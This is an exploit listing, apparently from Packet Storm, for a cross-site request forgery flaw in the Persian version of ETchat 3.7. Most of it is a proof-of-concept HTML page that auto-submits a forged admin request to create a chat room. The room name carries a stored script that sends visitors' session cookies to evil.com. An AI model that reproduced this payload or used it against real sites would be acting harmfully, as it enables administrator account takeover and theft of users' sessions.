ETchat version 3.7 suffers from a cross site request forgery vulnerability.
04a2de8c0f273cf4995eb86728c22b0966cdbc9aaa684a57a15e80675301a9c4# Exploit Title: ETchat(persian version) CMS Xsrf vulnerability
# Exploit Author: Hesam Bazvand
# Contact: https://www.facebook.com/hesam.king73
# Software Link: https://dl.20script.ir/script/chat/et-chat-3.7-Persian(www.20script.ir).zip
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : User Your Mind ! :D
# Email : Black.king066@gmail.com
#special thanks to my best friend Aryan Bayani Nejad
<html>
<body onload="document.frm1.submit()" >
<script>
var f = document.createElement("form");
f.setAttribute('method',"post");
f.setAttribute('name',"frm1");
f.setAttribute('action',"https://localhost/etchat/?AdminCreateNewRoom");
var i = document.createElement("input"); //input element, text
i.setAttribute('type',"text");
i.setAttribute('name',"room");
i.setAttribute('value',"<ScRiPt \>window.location.replace(\"https://evil.com\" + encodeURIComponent(document.cookie))\</ScRiPt\>");
f.appendChild(i);
//and some more input elements here
//and dont forget to add a submit button
document.getElementsByTagName('body')[0].appendChild(f);
</script>
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed